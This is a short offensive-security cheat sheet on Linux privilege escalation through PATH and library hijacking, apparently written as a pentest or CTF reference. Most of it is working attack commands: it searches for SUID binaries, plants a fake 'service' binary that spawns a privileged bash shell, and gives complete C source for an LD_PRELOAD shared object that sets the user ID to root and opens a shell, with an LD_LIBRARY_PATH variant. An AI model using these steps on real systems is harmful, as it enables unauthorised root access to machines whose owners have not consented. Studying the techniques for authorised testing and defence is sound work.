PATH Hijack & Library Hijacking

Find scripts calling commands without full path

If a SUID binary or cron job calls a command without absolute path — Hijackable

find / -perm -4000 2>/dev/null
strings /usr/local/bin/suspicious | grep -v "/"
# Look for: service, curl, cat, etc. without /usr/bin/ prefix

Create malicious binary in PATH

Prepend writable directory to PATH — Hijack command execution

echo '/bin/bash -p' > /tmp/service
chmod +x /tmp/service
export PATH=/tmp:$PATH
/usr/local/bin/suspicious
# Calls "service" which now runs /tmp/service = root shell

Writable PATH directories

Check if any PATH directories are writable

echo $PATH | tr ':' '\n' | xargs -I{} ls -ld {} 2>/dev/null

LD_PRELOAD hijack

If sudo env_keep has LD_PRELOAD — Instant root

# Check: sudo -l → look for env_keep+=LD_PRELOAD

cat > /tmp/shell.c << EOF
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setresuid(0,0,0);
    system("/bin/bash -p");
}
EOF
gcc -fPIC -shared -nostartfiles -o /tmp/shell.so /tmp/shell.c
sudo LD_PRELOAD=/tmp/shell.so <allowed_command>

LD_LIBRARY_PATH hijack

Missing shared libraries — Create your own

ldd /usr/local/bin/suspicious
# If any show "not found" = you can create it
gcc -fPIC -shared -o /tmp/libcustom.so shell.c
sudo LD_LIBRARY_PATH=/tmp <allowed_command>